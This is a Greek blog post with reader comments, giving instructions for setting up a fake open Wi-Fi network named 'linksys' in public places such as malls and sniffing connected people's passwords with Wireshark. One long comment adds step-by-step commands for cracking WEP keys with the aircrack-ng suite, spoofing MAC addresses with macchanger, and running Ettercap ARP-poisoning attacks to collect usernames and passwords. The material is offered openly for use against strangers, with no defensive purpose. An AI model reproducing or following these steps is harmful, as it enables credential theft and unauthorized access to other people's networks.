Δημιουργία ψεύτικου δικτύου για εύρεση κωδικών

Όλοι οι χρήστες έχουν την τάση εφόσον βρίσκουν κάποιο ασύρματο δίκτυο να προσπαθούν να συνδεθούν προκειμένου να εκμεταλευτούν την σύνδεση για να διαβάσουν τα email τους,να μπούνε στο facebook,να μιλήσουν MSN κτλ.Εμείς μπορούμε να εκμεταλευτούμε αυτήν την τάση προς ώφελο μας  φυσικά και να δημιουργήσουμε ένα ψεύτικο δίκτυο (που θα φαίνεται όμως σαν αληθινό για τους απέξω) για να ανακαλύψουμε κωδικούς και διάφορες άλλες πληροφορίες.

Τι θα χρειαστούμε?

  • Ένα laptop
  • Μία σύνδεση στο Internet ασύρματη (κατά προτίμηση 3G)
  • Το wireshark

Δημιουργία του δικτύου

Το πρώτο πράγμα που θα πρέπει να κοιτάξουμε είναι να επιβεβαιώσουμε ότι η ασύρματη κάρτα δικτύου μας υποστηρίζει την δημιουργία ad-hoc δικτύων.Εφόσον το δούμε αυτό δημιουργούμε ένα νέο δίκτυο ad-hoc με την ονομασία linksys διότι τα linksys είναι από τα router που χρησιμοποιούνται συνήθως και είναι πολύ πιθανό να βρίσκεται στην λίστα της ασύρματης τους κάρτας με τα δίκτυα που θα συνδέονται αυτόματα.Το ad-hoc το επιλέγουμε γιατί οι υπόλοιποι υπολογιστές που θα συνδεθούν στο δίκτυο θα συνδεθούν μέσω του υπολογιστή μας.Δηλαδή ο υπολογιστής μας θα είναι φαινομενικά για αυτούς ο router που όμως στην πραγματικότητα δεν θα υπάρχει.

Αφού δημιουργήσαμε το δίκτυο ενεργοποιούμε από τις ιδιότητες της νέας σύνδεσης του δικτύου μας το ICS (Internet Connection Sharing).Ο λόγος που θα το κάνουμε αυτό είναι για να έχουν πρόσβαση στο Internet όλοι όσοι συνδεθούν στο δίκτυο μας.

Αν βρισκόμαστε με το laptop μας σε κάποια περιοχή με πολύ κόσμο όπως κάποιο mall,τότε είναι πολύ πιθανό αρκετοί χρήστες να αρχίσουν να συνδέονται αφού συνηθώς πολλοί άνθρωποι ψάχνουν για δίκτυα είτε με τα netbook τους,είτε με τα κινητά τους τηλέφωνα προκειμένου να τσεκάρουν τα email τους κτλ.Δεδομένου ότι το δικό μας δίκτυο θα είναι και ανοικτό ακόμα και αν δεν βρίσκεται στην auto connect λίστα της κάρτας τους είναι πολύ πιθανό κάποιοι να το προτιμήσουν.

Εύρεση των κωδικών

Τώρα που έχουμε κάποια άτομα συνδεδεμένα στο δίκτυο μας θα πρέπει να αρχίσουμε να ελέγχουμε το τι κάνουν με την σύνδεση μας.Γι’αυτό θα χρειαστούμε το wireshark το οποίο είναι ουσιαστικά ένα sniffer και θα ελέγχει όλα τα πακέτα που θα περνάνε από το δίκτυο μας και κατά συνέπεια και όλα τα passwords που θα εισαχθούν σε ιστοσελίδες.Το ρυθμίζουμε ώστε να κάνει capture το interface (δηλαδή την κάρτα δικτύου) που χρησιμοποιούμε για να διαμοιράσουμε το Internet και το αφήνουμε να καταγράφει όλη την κίνηση του δικτύου και κατά συνέπεια και τους κωδικούς σε περίπτωση που κάποιος χρήστης του δικτύου τους εισάγει σε κάποια ιστοσελίδα.

Πρακτικά δεν έχουμε να κάνουμε κάτι άλλο απλά να το αφήσουμε για κάποια ώρα το wireshark και μετά να αναλύσουμε τα πακέτα για να  εντοπίσουμε τα passwords.Η λογική πίσω από αυτήν την τεχνική είναι να παίξουμε με την μνήμη των laptop/netbook και λοιπών gadget που όλο και σε κάποιο linksys δίκτυο θα έχουν συνδεθεί στο παρελθόν και έτσι να συνδεθούν αυτόματα πάνω σε μας αλλά και το γεγονός ότι θα πρόκειται για ένα ανοικτό δίκτυο σίγουρα θα προσελκύσει και άλλους επίδοξους χρήστες.

8 Σχόλια to “Δημιουργία ψεύτικου δικτύου για εύρεση κωδικών”

  1. Καμιά ανάρτηση για σπάσιμο , WEP ή WPA-PSK θα ανεβάσεις ?

  2. Φυσικά και θα γραφτεί ένα τέτοιο άρθρο θέλω να πιστεύω σύντομα.Δεν το έχω αμελήσει απλά θέλω να γίνει σωστά.Και στο λέω αυτό γιατί δεν πρέπει να γραφτεί στο πόδι,πρέπει να είναι πλήρως κατανοητό,να περιέχει screenshots βήμα βήμα κτλ.Θα προσπαθήσω να το ετοιμάσω μέσα στις επόμενες 10 μέρες.Έχε λίγο υπομονή.

  3. Αναμένουμε🙂

  4. Δεν καταλαβαίνω πώς επιβεβαιώνουμε ότι η ασύρματη κάρτα δικτύου μας υποστηρίζει την δημιουργία ad-hoc δικτύων.

  5. Μπορείς να το δεις από την διαχείριση συσκευών,προσαρμογείς δικτύου,διπλό κλικ στην ασύρματη κάρτα δικτύου και μετά καρτέλα για προχωρημένους.

    Η απλά όταν θα πας να δημιουργήσεις ένα καινούργιο δικτύο από τις συνδέσεις δικτύου θα πρέπει να σου εμφανίζει την επιλογή δημιουργία δικτύου ad-hoc.Μην ανησυχείς σχεδόν όλες οι κάρτες πλέον το υποστηρίζουν.😉

  6. Ευχαριστώ admin αλλά έχω ακόμα μια απορία, αυτο μπορεί να γίνει μόνο με laptob,δεν μπορεί να γίνει με κανονικό pc?

  7. Το νέο είναι ότι κυκλοφoρεί patch για ασύρματες κάρτες ιντελ. Ακόμη πιο ευχάριστο ότι δεν χρειάζεται patch εάν κατεβάσεις το BackTrack 2 Live CD. Είναι σε μορφή iso. Το καις σε δισκάκι και κάνεις εκκίνηση από το δισκάκι. Να πώ ότι περιέχει ένα σωρό εργαλεία για sniffing, spoofing ManInTheMiddle Attack κ.α. που τώρα τα μαθαίνω.

    1. Menu->Backtrack->80211->Kismet
    Ανοίγει εφαρμογή, βάζοντας την ασύρματη κάρτα σε κατάσταση παρακολούθησης (monitor mode). Εάν έχετε κουμπί που το πατάτε για να ενεργοποιηθεί η ασύρματη κάρτα (κυρίως για λαπτοπ) πατήστε το. Σε λίγο θα δείτε αν υπάρχουν ασύρματα δίκτυα κοντά. Το καλό είναι ότι εντοπίζει και «μη ορατά» ασύρματα δίκτυα. Με λίγα λόγια το κισμέτ είναι ο τέλειος οτακουστής. Κι όχι μόνο.
    Πληκτρολογείς:
    «h» Για πληροφορίες πατάς (help) ενώ στο παράθυρο μετακινείσαι με τα βελάκια. Για να δείς πληροφορίες για το δίκτυο πρέπει πρώτα να πατήσεις το «s» συντόμευση του sort (ταξινόμηση) και μετά ένα γράμμα από το μενού που θα βγάλει, όποιο να ναι πχ f για first seen. Ωραία, έπειτα πατάς το «i» (information) και εκεί χρειάζεσαι
    1. τον αριθμό του καναλιού που εκπέμπει το δίκτυο πχ channel
    2. το essid που είναι το όνομα του δικτύου
    3. τέλος, τη διεύθυνση ΜΑC (MAC Address) που είναι της μορφής ff:ff:ff:ff:ff:ff
    Κάπου εκεί αναφέρει και τι ασφάλεια έχει το δίκτυο (WEP, WPA κτλ) το εύκολο είναι το WEP. Αυτό μέχρι στιγμής έχω σπάσει, θα δοκιμάσω όμως και σε WPA. Σε φόρουμ αναφέρεται ότι σπάνε εξίσου εύκολα.
    Πατάς q (quit) και σε βγάζει πίσω στην οθόνη με τα δίκτυα. Εκεί πληκτρολογείς «c» και σου δείχνει τους πελάτες (clients) οι οποίοι είναι συνδεδεμένοι στο δίκτυο αυτό. ΓΡΑΨΕ ΤΗΝ MAC ADDRESS του. Πατάς πάλι «q» μετά SHIFT+q και φεύγεις από το κισμέτ.

    Ανοίγεις ένα παράθυρο τερματικού (το μικρό εικονίδιο οθόνης κάτω αριστερά).Δίνεις εντολή:
    «iwconfig» εμφανίζει τις συσκευές του υπολογιστή σου και εκεί βλέπεις ποιά είναι η ασύρματη κάρτα σου (eth0 ή eth1 ή ath1 ή ath0 κλπ). Έστω η eth1. Στις πληροφορίες για την ασύρματη κάρτα σου δές το Mode. Θέλουμε να γράφει Mode:Monitor. Εάν δεν το γράφει δώσε εντολή
    «iwconfig eth1 mode monitor» ή «airmon-ng start eth1». Ξαναδώσε εντολή «iwconfig» και επαλήθευσε ότι γράφει Mode Monitor.

    {Για να μην εκθέσουμε την MAC Address της ασύρματης κάρτας μας καλό είναι να την αλλάξουμε με το macchanger. Δώσε εντολή
    «macchanger -m ff:ff:ff:ff:ff:ff eth1» όπου ff βάλε ότι σου κατέβει, γράμματα ή αριθμούς ή και τα δύο μαζί. Πχ FR:EE:IN:TE:RN:ET :)}

    Δώσε εντολή:
    «airodump-ng –write test –channel # eth1» όπου # ο αριθμός του καναλιού στο οποίο βρίσκεται το δίκτυο. Δηλ λέμε στο airodump-ng να γράψει τα πακέτα που θα λαμβάνει, στο αρχείο τεστ και να ακούει στο κανάλι #, αν δεν βάλουμε κανάλι πηδάει από κανάλι σε κανάλι. Οπότε εμφανίζεται:
    CH: πάνω αριστερά, που δείχνει το κανάλι που του είπαμε να βλέπει.
    BSSID: η διεύθυνση MAC του δικτύου.
    ESSID: εάν μεγαλώσεις κατά πλάτος το παράθυρο θα δείς το όνομα του δικτύου κάτω από το ESSID.
    Beacons: που νομίζω ότι είναι πακέτα που διαβάζει
    Data: είναι αυτά που χρειαζόμαστε. Έσπασα WEP κλειδί με 70.000. Το ζήτημα είναι ότι βλέπεις πως δεν αυξάνονται γρήγορα. Για αυτό και θα χρησιμοποιήσω το aireplay. Σε περίπτωση που αυξάνονται αστραπιαία σε παρακαλώ να μου πείς εναν αριθμό για τζόκερ:)
    STATION: είναι η MAC διεύθυνση των πελάτων που είναι συνδεδεμένοι στo δίκτυο, του οποίου η MAC διεύθυνση αναφέρεται αριστερά από το STATION.

    ΑΣΕ το τερματικό ανοικτό, άνοιξε άλλο και δώσε εντολή:
    «aireplay-ng -3 -b η_διεύθυνση_MAC_του_δικτύου -h η_διεύθυνση_MAC_πελάτη eth1″
    Βλέπεις:
    Ένα μήνυμα το οποίο σου λέει πως η διεύθυνση της κάρτας σου δεν ταιριάζει με αυτή που έβαλες. Δεν μας πειράζει αυτό. Στέλνει πακέτα και λαμβάνει και μέσα σε παρένθεση είναι τα DATA που βλέπεις και στο airodump-ng. Άστο κανα δίλεπτο τρίλεπτο να λειτουργήσει, όλα θέλουν την ώρα τους, τα DΑΤΑ πρέπει να αυξάνονται σιγά σιγά αστραπιαία. Εάν συμβαίνει αυτό διάβαινε. Μέσα σε 15 λεπτά μάζεψα 70.000 πακέτα. Μία δεύτερη λύση είναι να βάλεις στην ασύρματη κάρτα σου τη διεύθυνση ΜΑC του πελάτη χρησιμοποιώντας το macchanger.

    Τέλος πρέπει να κατεβάσεις το aircrack-ng version 0.9. Το backtrack 2 έχει την 0.7. Δες το δίνοντας εντολή » aircrack-ng» ένα τερματικό. Στην πρώτη γραμμή αναφέρει την έκδοση. Το θέμα είναι ότι μόνο η έκδοση 0.9 χρειάζεται μόνο 70.000 -100.000 πακέτα.
    Aν έχεις ινερνετ δώσε σε τερματικό εντολή:
    «wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz»
    Αν δεν έχεις, πήγε στην διεύθυνση πάνω, κατεβασε το, βάλτο σε φλασάκι, άνοιξε το φλασάκι κανε copy to αρχείο, πάτα το πάνω βελάκι δυο φορές όπου θα δείς το φάκελο HOME και βάλτο εκεί μέσα. Άνοιξε ένα τερματικό και πληκτρολόγησε
    «tar -zxvf aircrack-ng-0.9.tar.gz»
    μετά
    «cd aircrack-ng-0.9»
    μετά
    «make»
    και τέλος
    «make install».
    Εάν τώρα δώσεις σε ένα τερματικό την εντολή «aircrack-ng»
    στην πρώτη γραμμή θα αναφέρει την βερσιον, πρέπει να ναι 0.9
    ‘Επειτα
    «aircrack-ng -z -b η_διεύθυνση_ΜΑΚ_του_δικτύου test*.cap»
    Η εντολή -b η_διεύθυνση_ΜΑΚ_του_δικτύου νομίζω ότι μπορεί να παραμεληθεί. Η εντολή -z είναι που κάνει τη διαφορά στη νέα βερσιον.
    ΥΠΑΡΧΟΥΝ ΚΑΙ ΕΝΑΛΛΑΚΤΙΚΕΣ ΕΝΤΟΛΕΣ ΑΝ ΚΑΠΟΙΟΣ ΑΝΤΙΜΕΤΩΠΙΣΕΙ ΠΡΟΒΛΗΜΑ.

    ΕΙΔΙΚΑ ΓΙΑ ΙΝΤΕΛ.
    Υπήρχε αναφορά ότι δεν υπάρχει συμβατότητα με τσιπ σεντρίνο και ιντελ κάρτες. Η λύση είναι ότι δημιουργούμε μία δεύτερη πρόσοψη (interface) η οποία θα «ακούει» από την ασύρματη κάρτα, η οποία πρόσοψη θα χρησιμοποιηθεί στο airodump δηλαδή θα μπεί σε λειτουργία μόνιτορ ενώ η ασύρματη κάρτα σου πχ eth1 θα ναι σε Mode Managed και θα χρησιμοποιηθεί στο aireplay. Επίσης δημιουργείται μία ψεύτική σύνδεση με το δίκτυο δίνοντας πλαστό κλειδί. Αναφέρω τις εντολές κατά σειρά.
    0.»iwconfig» βλέπεις το interface της ασύρματης κάρτας πχ eth1
    1. «iwlist eth1 scan» βλέπεις τα δίκτυα γύρω σου
    2.»rmmod ipw2200″
    3.»modprobe ipw2200 rtap_iface=1″
    4.»iwconfig eth1 essid ΟΝΟΜΑ_ΔΙΚΤΥΟΥ channel # key s:fakekey mode managed»
    5.»ifconfig eth1 up»
    6. «ifconfig rtap0 up»
    7. «airodump-ng –bsssid MAC_Δικτύου –channel # -w test rtap0″
    8.»aireplay-ng -3 -a MAC_Δικτύου -h MAC_της_κάρτας_σου -i rtap0 eth1» ή δεύτερη λύση «aireplay-ng -3 -b AP_MAC -h MAC_Διεύθυνση_Πελάτη -i rtap0 eth1»
    9. «aircrack-ng -z test*.cap»

    ΓΙΑ ΟΣΟΥΣ ΕΙΝΑΙ ΣΥΝΕΔΕΜΕΝΟΙ ΣΤΟ ΙΝΤΕΡΝΕΤ ΔΙΝΩ ΜΙΑ ΕΝΤΟΛΗ ΓΙΑΝΑ ΒΛΕΠΕΙΣ ΟΝΟΜΑΤΑ ΧΡΗΣΤΩΝ ΚΑΙ ΚΩΔΙΚΟΥΣ ΣΕ MAIL ΚΑΙ ΣΕ ΙΣΤΟΣΕΛΙΔΕΣ ΟΠΟΥ ΜΠΑΙΝΟΥΝ. ΠΑΛΙ ΧΡΗΣΙΜΟΠΟΙΩ ΜΠΑΚΤΡΑΚ.

    Ανοιξε τερματικό δώσε εντολή:
    «nano /usr/local/etc/etter.conf»
    χρησιμοποίησε το κάτω βελάκι και πήγαινε στη σειρά όπου γράφει
    # if you use iptables:
    #redir_command_on = «iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport»
    #redir_command_off = «iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport»

    Βγάλε τα δύο τελευταία #. Πάτα το F2, μετά το y και τέλος το enter.

    Menu->BackTrack->Spoofing->Ettercap
    Ανοίγει το πρόγραμμα όπου πας:
    Sniff –> Unified Sniffing –>ethX(το interface της σύνδεσής σου).
    Πάτα: Ctrl+S για σκανάρισμα
    Πήγαινε στο Mitm –> ARP poisoning, τσέκαρε το sniff remote connections.
    Πήγαινε Start –> Start Sniffing.

    Μου δουλέυει όταν βρίσκομαι σε δίκτυο αλλά όχι σε ασύρματο δίκτυο. Μπορείς να αφήσεις το πρόγραμμα να τρέχει και όταν θελήσεις να το σταματήσεις καλύτερα πρώτα να κάνεις ένα save του αρχείου για να δεις με την ησυχία σου τα usernames και passwords. Γράφει και σε ποιά ιστοσελίδα δώθηκαν!

    Για να το σβήσεις
    Πήγαινε Start –> Stop Sniffing
    Πήγαινε Mitm –> Stop mitm attack(s)

    Η όλη δουλειά στηρίχθηκε σε αναζήτηση φόρουμ, ξένων ιστοσελίδων, και χωρίς να έχω κάποια ιδιαίτερη γνώση μόνο μεράκι ε και λίγη περιέργεια:)

    • Μπραβο ρε doureios. Σε ευχαριστω και εκ μερους ολων για την προσπαθεια που εκανες και τον κοπο σου, εστω να συγκεντρωσεις, δοκιμασεις και παραθεσεις το «ζουμι» απο αυτα που βρηκες στην αναζητηση σου.

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Αρέσει σε %d bloggers: